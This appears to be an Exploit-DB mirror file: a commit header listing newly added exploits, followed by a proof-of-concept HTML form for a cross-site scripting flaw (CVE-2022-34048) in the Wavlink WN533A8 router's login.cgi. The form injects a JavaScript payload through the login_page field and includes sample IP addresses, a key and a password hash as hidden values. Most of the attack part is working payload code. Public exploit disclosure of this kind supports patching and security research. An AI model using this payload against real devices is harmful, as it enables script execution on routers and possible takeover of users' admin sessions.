exploit-db-mirror/exploits/hardware/webapps/50989.txt
Offensive Security 16b24da825 DB: 2022-08-02
19 changes to exploits/shellcodes

Omnia MPX 1.5.0+r1 - Path Traversal
Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)

OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)
Wavlink WN533A8 - Cross-Site Scripting (XSS)
Wavlink WN530HG4 - Password Disclosure
Wavlink WN533A8 - Password Disclosure
WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download
WordPress Plugin Duplicator 1.4.7 - Information Disclosure
CuteEditor for PHP 6.6 - Directory Traversal
mPDF 7.0 - Local File Inclusion
NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)
Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
2022-08-02 05:01:49 +00:00

32 lines
No EOL
1.4 KiB
Text

# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M33A8.V5030.190716
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34048
# Tested on: Windows
# Poc code
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST">
<input type="hidden" name="newUI" value="1" />
<input type="hidden" name="page" value="login" />
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="langChange" value="0" />
<input type="hidden" name="ipaddr" value="196&#46;219&#46;234&#46;10" />
<input type="hidden" name="login&#95;page" value="x"&#41;&#59;alert&#40;9&#41;&#59;x&#61;&#40;"" />
<input type="hidden" name="homepage" value="main&#46;shtml" />
<input type="hidden" name="sysinitpage" value="sysinit&#46;shtml" />
<input type="hidden" name="wizardpage" value="wiz&#46;shtml" />
<input type="hidden" name="hostname" value="59&#46;148&#46;80&#46;138" />
<input type="hidden" name="key" value="M94947765" />
<input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" />
<input type="hidden" name="lang&#95;select" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>